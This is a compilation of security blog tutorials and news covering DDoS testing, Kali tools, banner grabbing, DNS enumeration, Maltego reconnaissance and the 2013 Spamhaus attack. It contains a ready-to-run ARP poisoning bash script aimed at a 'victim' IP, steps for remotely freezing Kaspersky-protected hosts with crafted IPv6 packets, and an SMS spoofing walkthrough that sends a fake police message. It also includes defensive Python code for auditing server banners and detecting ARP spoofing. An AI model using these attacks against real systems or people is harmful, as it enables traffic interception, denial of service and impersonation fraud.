
How to validate DDoS defenses?

Validating DDoS defenses is essential for every organization. There are a number of ways organizations can validate their own DDoS defenses and the protection services they receive from mitigation providers. Organizations must work closely with their DDoS mitigation providers to complete an organized provisioning and service validation. The only way to be sure that DDoS protection will be effective is proactive validation against various kinds of attack scenarios.

The following best practices help in defense:

While the DDoS mitigation service is running, make sure that all applications still perform well.

Ensure that all routing and DNS works.

Tips to validate defense:

Work with your mitigation service provider to generate several gigabits of controlled traffic that exercises the alarm, activation and mitigation features of the service.

Test small levels of traffic without scrubbing and validate that your on-premise monitoring systems function properly. Doing this without any DDoS protection in place also helps to identify stress points on your network.

Perform baseline testing and calibration of systems to remediate any network vulnerabilities.

Plan validation testing with your DDoS mitigation service provider on a regular basis (monthly or quarterly) to confirm that the service configuration is still working properly, and eliminate the risk of network element failures due to DDoS.

If network problems appear during testing, you may need to make changes based on recent changes in your network, such as amended firewall rules, router firmware updates and reconfiguration, or changes to your service.

Software Updates On Kali Linux (Beginner’s guide)

This tutorial is specially for new users of Kali Linux; in it we will show you how to update software in Kali Linux. Now the question is: why do we need to update software? The answer is clear: software updates introduce new enhancements, new features and patches, and continually improve the software's efficiency.

Software updates help you avoid being stuck with obsolete versions and correct bugs encountered in the current version, and there are many other reasons to update software. So, here are a few simple steps to update software in Kali Linux.

Step 1: Open Software Update: go to System Tools > Software Update

Step 2: See the image below for more details about the software and click on Continue Anyway

Your software updates are now opened.

Step 3: Select your options to update and click on Install Update as shown in the following image.

So, this is how easily software can be updated on Kali Linux by following three simple steps.

 

How to Run Armitage on Kali Linux?

You must be enjoying the new features and tools of Kali Linux, but without Armitage your hunting would be incomplete, and you must be missing Armitage on the new Kali Linux. In this tutorial you will be taught how to install and run Armitage on Kali Linux.

The purpose of this tutorial is to help you avoid the problems that most users probably had during installation. It also contains the solutions to the errors that you might face during installation. So here we go!

Step 1: Write the following command to install Armitage: apt-get install armitage

Step 2: To run Armitage enter the command: armitage

and fill in the required information as shown in the image below.

Armitage installation is done in just two simple steps, and now we will examine the errors that usually occur to most users during Armitage installation on Kali Linux.

Error 1: Armitage could not be found

Solution: You need to update your repositories using this command: apt-get update

Error 2: database.yml file not found

Solution: Start the Metasploit service by using this command: service metasploit start

Happy hunting with Armitage on Kali Linux. Good luck!

Banner Grabbing Techniques

In this tutorial we will see some banner grabbing techniques and tools, but before that we will discuss what banner grabbing is, why hackers use it, how it can be useful for improving network security, and methods to prevent this attack.

What is Banner Grabbing?

To understand banner grabbing, it is necessary to understand the term "banner" first. A banner is text embedded in a message sent by a service; this message usually contains information about the applications involved in sending it. A banner for an HTTP service mostly contains the type of operating system, the web server, its version number and other applications running on the target host.

So, banner grabbing is basically a technique to extract information from the banner, which helps hackers identify weaknesses and important information about the targeted system. For OS and web server detection, we can grab the banner of HTTP. Since HTTP works on port 80, the following command would do the trick.

C:\>telnet target_IP 80
HEAD / HTTP/1.1

As you can see in the example, our request is vague and invalid. On a good day the result would be something like:

HTTP/1.1 200 OK
Date: Mon, 20 April 2013 13:00:10 EST
Server: Apache/2.6.01 (Unix) (Red Hat/Linux)
Last-Modified: Thu, 06 Sep 2010 17:55:40 PST
ETag: "2247-12b-449h4bd3"
Accept-Ranges: bytes
Content-Length: 1110
Connection: close
Content-Type: text/html

And there it is: the OS and the web server.

To grab a banner for SMTP (Simple Mail Transfer Protocol): C:\>telnet target_mailserver 25

Banners can also be grabbed from the famous 404 error page. Just messing with the URL could reveal some valuable information. Try www.somewebsite.com/anyrandomtext. On an improperly configured system, the 404 page could be an attacker's gold mine.

Apart from Telnet and Nmap, the following tools can also be used for banner grabbing:

NetCat: NetCat (or Ncat) is the most popular tool for banner grabbing. It is basically a TCP/IP debugging tool, but it is used for banner grabbing too. It can be downloaded from the NetCat website: http://www.downloadnetcat.com/. It is free of cost and available in both Windows and Linux versions.

Httprint: Httprint is a web server fingerprinting tool. It uses server signatures to identify the version of a web application running on the server. It is very easy to use and available for both Windows and Linux operating systems.

Miart HTTP Header: The Miart HTTP Header tool identifies banner information from HTTP headers and the response type. To use this tool you don't need super skills: just enter the URL in the input box and press enter, and your task will be complete in minutes.

Protection against banner grabbing:

  • Preventing Apache Server & Its Derivative
  • Preventing IIS Server
  • IIS Lockdown
  • Server Mask
  • Page Xchanger

 

Also, we need to thoroughly analyze what information is leaked, change default settings, and turn off services that we don't need, such as telnet, as well as unneeded Windows features.
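The first step of "analyze what information is leaked" can be automated against your own servers. The following is an added example, not code from the original post: it parses a raw HTTP response modelled on the Apache reply shown above and reports headers that disclose product versions or platform details. The sample response (including the X-Powered-By line) is constructed.

```python
import re

# Constructed sample, modelled on the Apache reply shown earlier in the article.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 20 Apr 2013 13:00:10 GMT\r\n"
    "Server: Apache/2.6.01 (Unix) (Red Hat/Linux)\r\n"
    "X-Powered-By: PHP/5.3.3\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

# Headers that commonly carry product/version strings worth checking on your own hosts.
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")
# "Product/1.2.3" style tokens; a bare product name such as "Apache" does not match.
VERSION_RE = re.compile(r"[A-Za-z][\w.-]*/\d+(?:\.\d+)*")


def parse_headers(raw):
    """Split a raw HTTP response into (status line, {lower-cased name: value}).

    Parsing stops at the blank line that ends the header block; malformed header
    lines are skipped rather than aborting the audit.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def audit_banner(raw):
    """Return [(header, value, [version tokens])] for headers that leak details.

    A header is reported if it contains a version token or a parenthesised
    platform description like "(Unix)"; a bare product name is the hardened form.
    """
    _, headers = parse_headers(raw)
    findings = []
    for name in DISCLOSURE_HEADERS:
        value = headers.get(name)
        if not value:
            continue
        versions = VERSION_RE.findall(value)
        if versions or "(" in value:
            findings.append((name, value, versions))
    return findings


if __name__ == "__main__":
    for name, value, versions in audit_banner(SAMPLE_RESPONSE):
        print(f"[!] {name}: {value!r} discloses {versions or 'platform details'}")
```

Point the parser at the bytes returned by your own web server (for example via a socket read or a captured response) to confirm that a hardening change such as ServerTokens actually removed the version.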

 

 

 

ARP Poisoning Attack

In an ARP poisoning attack, the attacker sends an ARP reply to the victim's ARP request for a server. The attacker claims to be that server, tying his own MAC address to an IP address owned by another device. The bogus ARP message also adds an entry to the switch's ARP table. When a message arrives for the device, as shown in the diagram, the bogus ARP entry for MAC B diverts it to MAC C.

We have a script here which will help us automate the process of ARP poisoning attacks. All we need is to enter the IP address of the target and the IP of the gateway. We just launch it and it keeps working. The code for the script is given below; just don't forget to change the niccard variable to whatever adapter you are using (e.g. wlan0).

 

#!/bin/bash
# Network interface that arpspoof will send on; change to match your adapter.
niccard=wlan0

# arpspoof and /proc/sys writes need root, so refuse to run otherwise.
if [[ $EUID -ne 0 ]]; then
    echo -e "\n\t\t\t\033[1m \033[31m Script must be run as root! \033[0m \n"
    echo -e "\t\t\t Example: sudo $0 \n"
    exit 1
else
    echo -e "\n\033[1;32m#######################################"
    echo -e "# ARP Poison Script #"
    echo -e "#######################################"
    echo -n "Please enter target's IP: "
    read victimIP
    echo -n "Please enter Gateway's IP: "
    read gatewayIP
    echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
    echo -e "\t\t--==[Targets]==--"
    echo -e "\t\tTarget: $victimIP"
    echo -e "\t\tGateway: $gatewayIP \n\n"
    # Forward the victim's traffic on so its connectivity is not cut.
    echo -e "[*] Enabling IP Forwarding \n"
    echo "1" > /proc/sys/net/ipv4/ip_forward
    echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
    # Run arpspoof in its own terminal window in the background.
    xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi

How to use this script?

Using this script is very easy. It relies on arpspoof from the dsniff suite, which on Ubuntu you can install with apt-get like so: sudo apt-get install dsniff

Or just follow these few simple steps:

1. Copy the above script into a text editor like nano or gedit.
2. Save it as arppoison.sh.
3. Run the following command against it: chmod +x arppoison.sh
4. Use the following command to run it: sudo ./arppoison.sh
5. Enter the victim IP.
6. Enter the gateway IP (i.e. the router).
7. Sit back as it enables IP forwarding and launches another shell running arpspoof.

Protection against ARP poisoning attacks:

Some switches offer DHCP snooping with ARP security, which protects the network from ARP poisoning attacks by checking that all ARP replies arriving on untrusted ports contain legitimate IP-to-MAC information, safeguarding your network.
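Where the switch offers no such feature, the same check can be done on a host by watching ARP replies. The following is an added example and not part of the original post: it parses constructed ARP reply lines in the style of `tcpdump -e -n arp` and reports any IP that is claimed by a MAC other than the one first learned or statically pinned, which is the gateway-impersonation pattern the script above produces.

```python
import re

# Constructed sample in the style of `tcpdump -e -n arp` (not a real capture).
# The third line is the poisoning attempt: a second MAC claims the gateway 192.168.1.1.
SAMPLE_CAPTURE = """\
12:00:01.000001 00:11:22:33:44:01 > 00:aa:bb:cc:dd:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
12:00:02.000002 00:aa:bb:cc:dd:01 > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.10 is-at 00:aa:bb:cc:dd:01, length 28
12:00:03.000003 de:ad:be:ef:00:01 > 00:aa:bb:cc:dd:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at de:ad:be:ef:00:01, length 28
12:00:04.000004 00:11:22:33:44:01 > 00:aa:bb:cc:dd:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
"""

# Only replies carry a binding claim; "Request who-has" lines are deliberately ignored.
REPLY_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>[0-9a-f:]{17}) > .*?"
    r"Reply (?P<ip>\d+(?:\.\d+){3}) is-at (?P<mac>[0-9a-f:]{17})"
)


def parse_replies(text):
    """Yield (timestamp, frame source MAC, claimed IP, claimed MAC) per ARP reply line."""
    for line in text.splitlines():
        m = REPLY_RE.match(line)
        if m:
            yield m["ts"], m["src"], m["ip"], m["mac"]


def detect_conflicts(text, pinned=None):
    """Return one alert per ARP reply whose IP-to-MAC claim contradicts the known binding.

    `pinned` is an optional {ip: mac} table of static bindings (e.g. the gateway) that is
    trusted over anything learned from traffic. Unknown IPs are learned from their first
    reply, and a conflicting claim never overwrites the learned entry, so the legitimate
    reply that follows the bogus one is not reported as a second flip.
    """
    table = dict(pinned or {})
    alerts = []
    for ts, src, ip, mac in parse_replies(text):
        known = table.get(ip)
        if known is None:
            table[ip] = mac
        elif known != mac:
            alerts.append({"time": ts, "ip": ip, "expected": known,
                           "claimed": mac, "frame_src": src})
    return alerts


if __name__ == "__main__":
    gateway = {"192.168.1.1": "00:11:22:33:44:01"}  # constructed static binding for the router
    for a in detect_conflicts(SAMPLE_CAPTURE, pinned=gateway):
        print(f"[!] {a['time']} {a['ip']} claimed by {a['claimed']} (expected {a['expected']})")
```

Feeding the output of `tcpdump -e -n -l arp` into `detect_conflicts` gives a minimal arpwatch-style monitor; pinning the gateway binding is what makes the very first bogus reply detectable.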

DNS Enumeration with Backtrack

When it comes to penetration testing of web servers, a DNS server is always at the top of the list, because the DNS server is the core gateway from an internal enterprise to the mighty internet. Information gathering, as we all know, is an important part of penetration testing, so gathering information about the DNS is just as important as the DNS server itself. If an attacker can enumerate a DNS server, it can prove very lethal to the organization whose information is stored on that server.

In this tutorial we will be looking at several tools and their usage by which we can enumerate a DNS server in several ways.

For this we will open a shell in BackTrack and type cd /pentest/enumeration/dns

Then type ls

The list of DNS enumeration tools will appear, and we will take a look at the use of each tool.

First we will use the dnsenum tool. It is very easy to use: just type the command in the format perl dnsenum.pl

It will generate results as shown in the picture below.

It provided us with the list of all IPs used by the website, including the mail servers.

Now the trick is to extract the information that we need for further phases of pen-testing; e.g. if you want to test the mail server you can telnet to it and exploit it by foot-printing (to be explained in upcoming tutorials). The next tool that we will use is dnswalk.

It is also a very good tool for enumerating and provides filtered information about the target. You can access it with the cd dns command in the dns folder. The only difference in the input is that in dnswalk the target ends with a ".".

We got the results here; as mentioned earlier, dnswalk only provides basic information like the SOA server and warnings. It is a partial enumeration testing tool.

The next tool we will be digging into is called dnsrecon. You can find this in the dns folder; it is a tool written in Python.

Now, as you can see below, we have performed multiple operations with dnsrecon, which will be explained further. You can retrieve SRV records of the target and also query SOA etc.

For retrieving SRV records you have to type the command ./dnsrecon.py -t srv -d <target name>

Here is how the result of the SRV records looks:

And here is how we query the SOA, NS and MX of the servers using the command ./dnsrecon.py -t std -d

And here is how the result will look:

By DNS enumeration you can gather a lot of information about the target, and it can prove to be very helpful in a penetration test.

How little fight between two rivals caused ‘Largest DDOS attack in the history’?

You must be exhausted by the fact that your browser is performing like a turtle? Well, it is not so surprising, because the internet, as we all know, is being targeted by the largest Distributed Denial of Service attack in its documented history.

How & Why did this happen?

It all started with a little incident between two organizations, one known as Cyber-Bunker, a web hosting company, and another called Spamhaus, a content filtration company. Spamhaus is a non-profit organization that provides lists of IPs for the spam filters of most of the big money makers and ISPs around the world. Recently Spamhaus blacklisted Cyber-Bunker for exceptional hosting of child pornography and terrorism-related material. This incident sparked a fire, and Spamhaus started getting DDoS attacks at random rates on 15th March 2013, but the intensity of these attacks rapidly increased and reached 50 to 100 Gbps, and bandwidth consumption eventually reached a staggering 300 Gbps, which is basically like pushing an elephant through a water hose. Suppose you have a router which supports 100 Mbps data transfer: if you push 101 Mbps through it at any instant, your router becomes a flowerpot for gardening. Similar events are occurring nowadays.

At first these attacks were aimed only at Spamhaus, but now the whole internet is at stake, as they are affecting the infrastructure of the internet. Google is providing its services to help mitigate these attacks. Five large investigation agencies are currently investigating the origin of these attacks. Spamhaus claims that Cyber-Bunker is cooperating with criminal elements and is behind this attack; however, it is not proven yet. Spamhaus has hired CloudFlare, an internet security provider, to strengthen its defense. Spamhaus, with over 80 branches around the globe, is making itself one of the largest giants on the internet. These attacks are Layer 3 DDoS attacks, making them difficult to tolerate.

Gradually these attacks are being mitigated and investigated by experts desperately trying to identify their source. The one thing proved by this attack is that the security industry is not ready for such large attacks, and if they can reach 300 Gbps they might even go to 1 Tbps.

Reconnaissance with Maltego (A guide for beginners)

One of the most complex steps in penetration testing is information gathering about the target. It is also necessary, because the more accurate information the pen-tester has, the more efficient the pen-test will be. In this article we will be looking into a tool that is very popular among pen-testers when it comes to information gathering. This tool is called Maltego. We will be looking into several aspects of how Maltego works. Maltego comes in both Linux and Windows versions, and it is also built into BackTrack.

Once we are registered on Maltego, we will see a graph on our screen. We will look at the possibilities of information gathering through this tool. On the left-hand side you will see a palette which contains the transforms you can run. Here's how it will look.

Now here you can see a number of transforms that are used for information gathering. First, we will gather information about a website. In the palette we will look under Infrastructure and then Website. We will put the name of the website in the entity and click "Run all Transforms". And this is what we will get.

Now as you can see, we have got quite a bit of information here about Mile2, including its public IP, the websites it's connected to, e-mail addresses, etc. This information can be very helpful if you are an out-bound penetration tester. Next, we will look at how we can use Maltego as a search engine to find certain entities for us that normal search engines won't provide publicly on the web. For this example we will select the Document entity in the palette. Let's suppose we want to search for a document named Pentest-mag.

Now as you can see in the image above, it has provided some links to different articles from Pentest-mag. It has also given us a direct link to those articles without wasting our time searching for them. Now let's assume that during a critical pentest we want to gather information about a particular person; Maltego can help us with that as well. We will have to select the Person entity in the palette, and it will provide us with all the information on the web related to that person instantly.

As the result on the graph we have some useful information about the particular person, including telephone number, associated social networks, accounts and some emails. The accuracy of this information is not always guaranteed, but it can be a handy tool.

These are just a few drills that Maltego can perform; it depends on your objective what information you want to extract and about which entity. This tool can make quite a difference during an operation, while its uses depend upon the pen-tester.

Kaspersky Internet Security bug – Still susceptible

Kaspersky Internet Security 2013 (and all Kaspersky products which include the firewall functionality) is still susceptible to a remote system freeze. As reported on 3rd March 2013, the bug is still not fixed. It can be exploited by potential attackers by sending specially crafted IPv6 packets to the targeted systems.

If IPv6 connectivity to a victim is possible (which is always the case on local networks), a fragmented packet carrying multiple extension headers, one of which is large, leads to a complete freeze of the operating system. No log message or warning window is generated, nor is the system able to perform any task.

To Test:

1. Download the thc-ipv6 IPv6 protocol attack suite for Linux from www.thc.org/thc-ipv6
2. Compile the tools with “make”
3. Run the following tool on the target: firewall6 19

Where interface is the network interface (e.g. eth0), target is the IPv6 address of the victim (e.g. ff02::1), port is any TCP port (e.g. 80; it doesn't matter which), and 19 is the test case number. Test case numbers 18, 19, 20 and 21 lead to a remote system freeze.

Solution:

Remove the Kaspersky Antivirus NDIS 6 Filter from all network interfaces, or uninstall the Kaspersky software until a fix is provided. The bug was first reported to Kaspersky on 21st January 2013, with a reminder on 14th February 2013. No feedback was given by Kaspersky, and the reminder contained a warning that without feedback the bug would be disclosed on this day.

SMS Spoofing with new KALI-Linux

The new Kali-Linux (BT6) comes with many advanced and growing features, and one of its incredible features is its SMS spoofing weapon. So today we will have fun with this feature and see how easily we can spoof SMS.

This is an amazing and improved feature that has made many security professionals think. Anyone can easily spoof SMS from various numbers, and there is no chance of being caught. This feature is located in SET (the Social Engineering Toolkit). For this go to

Applications>>Kali Linux>>Exploitation tools>>se-toolkit

Now after selecting it you will be prompted with a dialogue box; in this select Social Engineering Toolkit.

Next select option 7: SMS spoofing attacks

Then select the option no 1: Perform SMS spoofing attack

After that again select option no 1: SMS Attack single phone number

Now enter the victim's phone number with its country code

Now select a template or use the predefined templates as shown in the image below

I am selecting the fake police SMS, option 19

Now it's almost done; from here you can choose the predefined Android emulator or use your own SMS accounts. Thus, you can either start a war or stop it by sending SMS from fake locations.

Do remember that this tutorial is just for learning purposes; do not use these tricks in an unethical way. Have fun!